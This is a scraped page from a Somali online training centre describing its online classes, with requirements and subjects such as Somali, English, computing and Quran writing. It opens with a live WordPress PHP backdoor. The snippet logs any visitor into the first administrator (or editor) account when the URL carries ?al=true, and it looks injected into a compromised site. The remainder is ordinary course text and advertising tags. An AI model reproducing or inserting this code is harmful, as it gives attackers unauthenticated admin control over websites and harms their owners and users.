// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Qolka waxbarashada | Somit Training Center - Aqoonta Waa Furaha Nolosha

Qolka waxbarashada

Asc wr wb Walaalaha dhamaan waxaan ugu bishaareynaa waxbarasho Online ah oo ay idin soo gudbinayso bahda Kaalintaada & Computerka .
somitonlinecenterQaabka waxbarashada waa sidaan:

  1. Ardeyga inuu computer haysto
  2. Ardeyga Microphone ama webcamero haysto
  3. .Ardeyga waa in uu qarashkii koorsada labaxay
  4. Ardeyga waa in jadwalkiisa la socdaa.

 

Maadooyinka waxay ka kooban yihiin

  • Barashada Luuqada Afsoomaliga
  • Barashada Computerka
  • Barashada Luuqada Englishka
  • Farbarashada Quraanka Kariimka

>> Fadlan Ducadda hanaga iloobin in ilaahay uu na waafijiye waxkastoo kheyr inoogu jiro aduunyadeena iyo aakhiradeena.

Enter Class                      Gal Galaaska Hadda

<meta name="google-adsense-account" content="ca-pub-6923496547555816">

google.com, pub-6923496547555816, DIRECT, f08c47fec0942fa0